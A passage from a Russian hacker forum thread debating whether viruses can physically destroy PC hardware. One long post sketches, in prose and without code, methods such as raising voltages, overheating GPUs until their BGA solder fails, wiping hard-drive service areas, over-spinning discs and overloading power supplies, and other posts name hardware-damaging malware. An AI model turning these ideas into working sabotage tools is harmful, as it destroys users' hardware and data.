2) На счет HDD - Кто Криса читал, он писал в каком-то хакере о вреде запуска и останова винта. (Как часный случай это ждущий режим). Очень вкратце пересказываю: Если постоянно запускать и останавливать то можно убить. Особенно вредно запускать винчестер во время его останова, т.е. он еще не успел остановится, и уже запускается. - тогда эффективность "изнса" увеличивается в разы. Между прочим мой винт странно себя ведет - во время работы винды может остановится/запустится. :confused: Может с питанием у него плдохо, а может и с вирус :cool: . (В линуке не замечал, но работаю там на порядок меньше).
3) В каком-то хакере было упоминание что можно спалить даже клавиатуру. Наверное шутка.
4) На счет CPU. В тестах кулеров встречал как что-то из серии core (то ли 2Extream то ли Quard) нагрели до 110 градусов - при этом он еще работал и комп вытащили из розетки, т.к. проц стоил (это точно запомнил :D ) более 1000$. Намек понятен? Нет - разогреть еще сильнее возможно, (разгоном или выключением|уменьшением скорости кулеров - не важно) и что он не сгорит после этого?
З.Ы. Если повторился, извеняюсь. То ли форум глючит то ли модеры не успевают уберать за флудерами. Но прочитав всю тему встретил несколько цытат на сообщения которых нет.
на старом школьном компе под управлением win95 уговорил препода попробовать чернобыль в действии для "научного експеремента".
результат - комп после перезагрузки сразу умер) и так и не смог протянуть до 26 апреля))
Скажи преподу что есть такой вирус: Win32.Ubey_sebya_ob_stenu.a :)
Вообще просто препод знает, что среди людей отдаленных от компьютьерной тематики существует мнение что компьютеры чуть ли не взрываются при вирусе....
А один парнишка (6-классник) как-то спорил со мной, что люди тоже умирают от компьютерных вирусов, и что скоро нас всех ждет конец света :))))) вот так вот
Железо сжечь изпод винды незя никак!!
Вот разве-шо из под крышки системного блока можно сжечь )) Ребята давайте напишем вирь (на СоцыальнойИнженерии) который убивает железо (но работает только на ламерах) вот идея в том, чтобы убедительно написать ламеру чтобы он снял крышку системки и с помощю паяльника припоя и пары проводков замкнул себе некоторые контакты на мамке ) Ето будет супер вирус ибо он не палится антивирями, палится токо мозгами человека, если версия мозгов старая (ламер) то он не пропалится. Работает 100% но не на 100% людей )
Железо сжечь изпод винды незя никак!!
Вот разве-шо из под крышки системного блока можно сжечь )) Ребята давайте напишем вирь (на СИ) который убивает железо (но работает только на ламерах) вот идея в том, чтобы убедительно написать ламеру чтобы он снял крышку системки и с помощю паяльника припоя и пары проводков замкнул себе некоторые контакты на мамке ) Ето будет супер вирус ибо он не палится антивирями, палится токо мозгами человека, если версия мозгов старая (ламер) то он не пропалится. Работает 100% но не на 100% людей )
Не каждый ламер крышку снять сможет! Так что не 100%, а 50%
2Macro ну я же сказал - работает 100% но не на 100% ламеров ваще ))
NightNinja
06.01.2008, 12:47
я думаю хард можно испаганить...
например мега частыми обращениями к нему.
я думаю хард можно испаганить...
например мега частыми обращениями к нему.
Винда не позволит. Вроде как и раскруткой его быстро в разные стороны можно бы попортить, но винда не пустит
Можно сжечь, если ламер запустит прогу, до запуска винды. Можно например из под ДОС, а так винда не позволит т.к. она работает в защищеный режим .
Попробую подвести итог, основаный как на прочитаном топике, так и на собственных знаниях/опыте.
1) BIOS. Действительно прошить BIOS даже из под винды можно практически на любой, тем более на современной материнке. Практически для любой материнки есть так называемый WinFlasher, как раз для этого и предназначенный. Он зашивает BIOS любым выбраным файлом, и весит он как правило не более 100к (если не содержит прошивку в себе). Инфу о материнке и BIOS умеют получать множество утилит, таких как Everest, Sandra итд... Следовательно написать даже универсальный вирь под большинство современных материнок возможно, и даже не сложно. Другое дело, что практической пользы от такого виря его автору нет, по этому врядли кто-то будет этим заниматься (хотя написал-же кто-то чих)...
НО!!! Прощивка BIOS не является аппаратной частью, и всегда восстановима (правда геморно, и зачастую только на программаторе или другой материнке), но всёже не является порчей железа. Возможно - да. Но обратимо.
2) CPU. Убить проц через волшебные прерывания итд невозможно. Сказки это всё. А вот через напряжение питания и управление кулером - вполне возможно. Но это скорее "заслуга" производителей материнок, которые мало того что напихали в них функции оверклока, всякие там SmartFan итд, но ещё и предусмотрели возможность управления всем этим из под винды "фирменными утилитами". Дело в том, что софт-вольтмод (програмное изменение напряжения питания) например процессора реализован довольно просто: есть либо ЦАП, либо ШИМ с НЧ фильтром, который подключен к базе транзистора (или транзисторов) питальника процессора. Естественно на материнках с вышеупомянутыми возможностями всё это управляется програмно, а значит напряжение можно менять прямо на лету и даже из под винды (что собственно оверклокерские утилиты и делают). Ну а тут уже кто на что горазд... Либо просто пытаться выставить его на поддерживаемый максимум, либо пытаться найти дырку, через которую напряжение удасться выставить выше разрешенного. Тоже самое и с так называемым SmartFan - когда чем горячее на данный момент проц, тем быстрее вращяется кулер. Иногда это настраивается теми-же утилитами. Проблема в том, что все современные процы уходят в защиту по превышению температуры, так что их этим не убить. Максимум - повесить или вырубить комп. Короче с этим понятно. А что касается FSB и прочих манипуляций с частотами - не знаю ни одного случая, когда что-либо необратимо выходило из строя. Обычно даже если комп "умирал" - он лечился сбросом CMOS или накрайняк перепрошивкой BIOS.
Итог: напряжением возможно, а кулером, частотами итд - нет (ну или за исключением каких-то особых экземпляров, но для массового вируса это не подходит).
3) Жесткий диск. Что касается слишком частого обращения - сразу нет. Винт рассчитан на работу в режиме Non-Idle или по русски "Без отдыха". Максимум что при этом происходит - он нагревается. При этом просто происходит термокалибровка (пересчитываются адаптивы итд...) и он продолжает работу. В этот момент может показаться что комп подвис, или винт даже может издавать несвойственные ему звуки, но эта процедура занимает не более секунды, и работа продолжается.
Далее - затирание или изменение каких-либо облатей. По сути это ему тоже не страшно, т.к. по умолчанию винт адресует контроллеру только те области, где нет никакой служебной информации - только данные. А т.к. порча данных даже в самой извращённой форме не является порчей железа - это нам неподходит. Но тут нужно сделать оговорку - если удасться "достучаться" до IDE контроллера определенным образом, то можно запросто получить доступ и к служебке винта, и ещё ко многим интересным областям... Вот тут уже можно довести винт до такого состояния, что даже в СЦ не смогут оживить, т.к. если служебка полностью затерта винт не сможет выйти в готовность... Это всё равно что материнка без BIOS, только его не перепрошить, т.к. храниться он на блинах...
Итоги по винту: Теоретически возможно, но только через низкоуровневое управление контроллером, и для этого нужно оооочень много инфы и труда... Врядли такие вири кто-то писал или напишет...
4) Оперативка. По аналогии с процом - возможно только через изменение напряжения функциями материнки. Но на памяти это поддерживается ооочень малым кол-вом плат. Так что тоже возможно, но как и с ЦП врядли такая игра стоит свеч.
5) Монитор. ЖК сразу нет - там нечему дохнуть. А вот ЭЛТ (CRT) - это дааа... Я сам лично лет 5 назад раздобыв инфу о низкоуровневом программировании видеокарт проводил эксперементы с ненужным монитором (какая-то древняя хрень noname или полный аналог :-) на видюшке matrox (не помню какой, но тоже древней). Так вот сначала я докопался до сведения лучей, и сведя всё изображение в одну точку "выжигал" тёмные пятна на теневой маске, водя этим пуком из стороны в сторону, а на последок игрался с частотами и повышением напряжения на трубке... Кинесоп - таки бахнул, причём красиво... Но и тут физику не обманишь... Внутри кинескопа вакуум, по этому он аккуратненько сложил все осколочки сам внутри себя, и я хоть и усрался от страха, но не получил ни царапинки ))) Хотя не отрицаю, что при определённом стечении обстоятельств осколком может ранить или даже убить человека...
Но ни современные видюхи, ни мониторы начиная с TCO'99 не позволяют делать ни один из этих фокусов.
Итог: Да, возможна серьёзная порча монитора, но только старого, и только на тарой видюхе. Опасность для человека есть, и возможно даже смертельная, но шанс очень мал... Физику всётаки не обманешь...
6) Привод. Написать программу, которая открывает-закрывает привод может каждый школьник, но врядли она сотрет шестерёнки. Попадаются приводы, которым более 10 лет. У меня на самом древнем компе дома стоит привод 94 года выпуска, тоесть ему 14 лет, при этом он регулярно используется. Механика у него в полном порядке, специально разобрал и посмотрел (сильно заинтересовала тема про шестеренки). А вот раскрутить диск до бешеной скорости действительно позволяют многие приводы вплоть до поколения 52x читалок, и даже на некоторых современных это прокатывает, и диск реально разлетается, и привод реально может сдохнуть. Более того - даже вирь подобный гдето на глаза попадался.
Итог: Да, возможно через раскрутку диска, но тоже не везде.
7) Видюха. Интересная тема, и вот почему: большинство видеочипов выдерживают очень большие температуры (например GPU nvidia 6й серии по даташиту могут работать в штатном режиме при температуре до 129 градусов по цельсию. Нет тут опесатки - именно 129. Тоесть в реальность они выдержат ещё немного больше. Допустим чип уходит в защиту примерно при 120 градусах (на своей проверял - примерно так и есть), при этом он не дохнет, но проблема в его пайке: он стоит на шариках. Такой метод пайки называется BGA. Большинство современных чипов паяются именно так. Вместо ножек и дырочек для них, и на чипе и на плате есть просто ровные площядки. На них (на чип) ставятся шарики из припоя, и под нагревом слегка приплавляются. Затем чип с шариками размещается на плате и припаивается к ней. Теперь вернмся к температурам. При температуре в 120 градусов припой уже слегка размягчается (хотя ещё и не плавится), а текстолит и платы и чипа деформируется - как правило один из углов чипа изгибается по направлению от платы. Так как припой ещё не расплавлен, обычно хватает десятой миллиметра чтобы контакт между шариком и площядкой пропал. При этом (зависит от назначения вывода) видюха может либо вообще не рабоать, либо показывать изображение с дефектами, или лишиться например TV выхода итд... Той-же больезнью страдают и BGA чипы памяти на видюхах, которые мало того что сами греются, так ещё и подогреваются GPU, а на них обычно нет радиатора... Но это уже подробности - суть ясна: если очень сильно и надолго нагрузить видеочип - он может сдохнуть. И дохнут. Причём много их так дохнет. А в ноутбуках так просто ужас - там нет места для нормальной системы охлаждения. По этому ноутбуки с наклейкой "игровая модель" или типа того обычно первые знакомяться с сервисным центром, т.к. мало того что в них аццки мощный видео чип, так ещё и играют на них немеренно...
Итог: возможно, и не очень сложно, но только современные "горячие" видюхи, и надо ухитриться её нагрузить так, чтоб перед юзером не палевно было. Но всётаки возможно.
8) БП. Да, даже его... Специально проводил эксперемент. Способ убийства достаточно простой, по этому подробно касаться его не буду... Нагружается проц на максимум, видюха на максимум, винт (а лучше несколько) постоянно останавливается и стартует, и привод на запить DVD болванки на высокой скорости. На компе Athlon 64 3200+ с видюхой GF7600 и двумя винтами БП PowerMaster на 350 ватт сдох за 1.5 минуты. Понятно что бп не супер, и для этой машины слабоват, но у большенства ламеров что-то подобное обычно и стоит, а следовательно...
Итог: если подловить момент когда юзер например пишет болванку, начать весь этот ужос то БП убить проще простого... Дело в том, что лазер при записи диска потребляет ток в импульсном режиме, винт при раскрутке жрёт очень много тока (по этому на серверах винты раскручиваются по очереди), и все серьёзные чипы (CPU, GPU итд) тоже питаются через импульсные питальники... А т.к. частоты везде разные, предствьте какой ужасный разброс нагрузки будет идти практически по всем линиям БП... Так что возможно, но на сколько я знаю ещё никто таких вирей не писал.
Ну вот, всё что вспомнил в пол седьмого утра вроде описал. Длинно конечно, но думаю что интересно. Заранее сорри за появляющийся кое-где оффтопик, и за ошибки тоже ногами не пинать... Когда хочется спать клавиатура плохо слушается.
ЗЫ: с удовольстием выслушаю критику и поспорю с несогласными )))
Duke Nukem
17.02.2008, 23:47
По поводу убийства Жестких Дисков хочу добавить, есть достаточно старая софтина HddKill, по заявлению людей которые пробывали её запускать, винт можно выкидывать.
Да, всё равно, везде уже аппаратная защита от всяких таких трюков стоит...
CIH (Чернобыль) только он...
Он стирает перезаписываемый Bios (Flash bios) камп перестает выдавать любые жизнерадостные звуки...
Смысл убивать хард если можно убить камп=)?
Смысл убивать хард если можно убить камп=)?Кому нужна та мать, если на винте важные данные. (вирь под определенного чела).
ИМНО писать его ради "НАГАДИТЬ ВСЕМ" тупо, а вот кто-то один до такого может довести или как варант конкурентам.
Конечно без предварительной разведки будет сложно.
Cthulchu
23.02.2008, 23:38
ну дык, СИ - рулит.
Он стирает перезаписываемый Bios (Flash bios) камп перестает выдавать любые жизнерадостные звуки...
Смысл убивать хард если можно убить камп=)?
Тут уже писали, что прошивка биос это микропрограмма, и значит CIH портит софт. А тема про порчу вирусами железа.
Cthulchu
24.02.2008, 14:44
б-р-р-р-р... Вы еще начните извечный спор о том, что есть причиной и что есть следствием и вообще, все ли завязано причинно-следственной связью.
О каком бреде {(извеняюсь)} вы говорите? Считаете что или вирус должен быть аппаратным или аппаратная часть программной. Как может программа влиять на железо, не взаимодействуя с железом??? Любой вирус взаимодействует с софтом, так как пишется под какую-то ОС/прогу. И, в то же время, любой вирус взаимодействует с железом, так как ОС компилирует вирус встроеным (или встраиваемым) языком и переводит его на низкий уровень (Асемблер, 16, 2.) На нижайшем уровне вирус уже не программа. Вернее - совсем непривычная программа. Да и пребывает он там такты (миллионные секунды).
Допустим, вирус, что портит дрова на видяху и палит монитор, заставляя его работать на тысяче МГц (щаз такое почти невозможно). Сам вирус монитор не палит. Да и вообще, я не представляю как это даже в абстрактной теории возможно, чтобы вирус САМ убивал железо.
Ну, развечто мужычок нехилый с надписью "ВИРУС" на лбу начинает вставлять ДДР в слот ДДР2, а потом шлейф флопа в винт, вверх ногами питалово в саташный винт, видяху наоборот, проц наоборот. Тогда у него принцип работы - сборка без ключей.
Ух, я погнал, передаю очередь следующему)
Есть. Более того, есть паблик исходники.
Вопрос устарел. Сейчас надо биться над вирусами третьего покаления, убивающими пользователя компьютера ))
cataha01
28.02.2008, 23:36
Я чесное слово не особо в железе ...
Но раньше если мне не изменяет паметь можно было програмно из подвинды менять обороты кулера проца ....
ну зделать 5 от перегрева может с лететь ...
хотя новые матери пищат и в защитный режим встоют но не все и невсегда
....
а ещё можно на мать для AMD (или как там поновому ) поставить плату skyStar2 и pci
после устоновки дров горят нахрен проверенно ...
(сам так мать сполил потом на сайте прочитал что нельзя такие использывать )
echobyte
09.03.2008, 14:36
Маленький хакер прогу писал,
Правил, отлаживал, переживал.
Люстра с веревкой в затихшей квартире:
Нет лучше CIH'а вируса в мире.
По поводу убийства Жестких Дисков хочу добавить, есть достаточно старая софтина HddKill, по заявлению людей которые пробывали её запускать, винт можно выкидывать.
по заявлению других людей, он форматирует винт за 5 секунд, при этом данные трудно восстановить.
ну дык, СИ - рулит.
СИ - социальная инженерия
Ну если теоритически) через открытые порты (Вплоть до Dcom) такой вирус хрен запихнешь ибо он должен быть exe формата и нести ряд команд перегружающих или выполняющих форматирование.
Ну может я нуб и нихрена не понимаю=) Но обьясните мне, как можно засунуть такую утилиту без активной части вируса???
Это каким идиотом нужно быть чтобы такое пугало запустить у себя))
Тс hddkill просто форматирует жесткий и все=)
У знакомого был вирус который сбил измеритель температуры на проце.тем самым в биосе отображалось что что за 30 секунд она достигала 95 градусов и комп вырубался=)прикол в том что все меняли не помогло и винду не переустановить выключается,куллер стоял навороченный поэтому отпадает то что он реально нагревался.
Duke Nukem
05.05.2008, 01:19
Я вижу моя тема всё ещё жива, но со времи её публикации много воды утекло, были раньше хорошие вирусы, Чих или hddkill тот же...(который к стати не просто форматирует ЖД, всё зависит от версии вируса и формата винча =) ) Но сейчас компы порасли столькими системами защиты которые практический сводят на нет угрозу горения железа, но всё же не стоит забывать те не далёкие годы))))) А препода я тогда уделал класно, и получил уважение среди своих сверстников, Спасиба Античату!!!)))))
"Так кто же она...Та тонкая ниточка которая связывает Железо и Софт в единое целое..."(с)
Лан,может есть всё-таки линк на закачку какого-то железоубиваюСЧЕго виря?
Diablo@Dragon
13.05.2008, 12:35
На прямую вируса нету чтобы убивал железо
кто то выше писал про перегрев процессоров так вот помима защиты на матерях от перегрева в камнях уже давно стоит своя зашита где при перегреве проца он автаматом снижает свою частоту
ктото говорил что винт вырубается в винде сам посебе ну курим мануалы на винты средства защиты
винт может рубится от перегрева у новых винтов встроенная система зашиты и если он перегривается он сам опускает шпиндель никаго ниспрашивая и его вообше неволнует что в данный момент делает пользователь
на счёт старых мониторов да можно пальнуть моник но они все настолько разные что уневерсальное средство просто тяжело подобрать и то касательно старых такие уже давно редкость
самый жестокий вирус это был чернобыль он единственный который реально выводил из строя систему целиком но и то только в том случае если перемычка на матери стояла на прошив биоса и страшнее всего это было там где он был запаен сам биос
были конечно вирусы которые портили дискеты ну и вследствии сбивали головку дисковода но это всё шалости и невсегда срабатывали
а вот всё остольное железо прикрыто достаточно хорошо
HackerOK
20.05.2008, 18:07
Както давно слышал что есть вирь который просто тихонько,постепенно вырубает куллеры...
Кто,что скажет за meloman.exe?
Как он работает?
Погуглил,не нашёл.
Както давно слышал что есть вирь который просто тихонько,постепенно вырубает куллеры...
Есть миф такой про "CIH" , но он действует по другому сценарию.
Кто,что скажет за meloman.exe?
Как он работает?
Погуглил,не нашёл.
KIS говорит:
meloman.exe,
meloman_upx.exe - Trojan.Win32.KillFiles.hk
Свежее пополнение ПО убивающего железо xttp://www.opennet.ru/opennews/art.shtml?num=18048 Тут про дрова для интеловых карт которые выводят эти самые карты из строя
vBulletin® v3.8.14, Copyright ©2000-2026, vBulletin Solutions, Inc. Перевод: zCarot